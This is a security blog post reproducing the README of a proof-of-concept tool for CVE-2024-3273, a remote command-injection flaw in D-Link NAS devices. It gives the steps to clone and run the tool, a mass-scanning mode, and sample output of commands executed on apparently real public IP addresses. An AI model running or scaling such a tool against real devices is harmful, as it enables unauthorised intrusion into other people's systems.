Cyber security

CVE-2024-3273 Proof Of Concept (PoC) : Unveiling The Vulnerability In D-Link NAS Devices

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.

The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.

Requirements

  • Python 3.x
  • requests library

Usage

  1. Clone this repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git

2. Navigate to the repository directory:

cd CVE-2024-3273

3. Run the PoC:

python main.py

4. Follow the on-screen instructions to choose the target device:

  • Option 1: Single Host (1): Enter details for a single target device, including the host IP address and command to run.
  • Option 2: Multiple Hosts (2): Provide a file containing multiple target devices in the format host:port, and choose whether to export vulnerable hosts to vulnerables.txt.

    Example

    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.

    Varshini

    Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

    Recent Posts

    CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

    Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

    11 hours ago

    How to Bash Append to File: A Simple Guide for Beginners

    If you are working with Linux or writing bash scripts, one of the most common…

    11 hours ago

    Mastering the Bash Case Statement with Simple Examples

    What is a bash case statement? A bash case statement is a way to control…

    11 hours ago

    How to Check if a File Exists in Bash – Simply Explained

    Why Do We Check Files in Bash? When writing a Bash script, you often work…

    2 days ago

    Bash Arrays Explained Simply: Beginner’s Guide with Examples

    If you’re learning Bash scripting, one of the most useful features you’ll come across is…

    3 days ago

    Bash For Loop Examples Explained Simply for Beginners

    If you are new to Bash scripting or Linux shell scripting, one of the most…

    4 days ago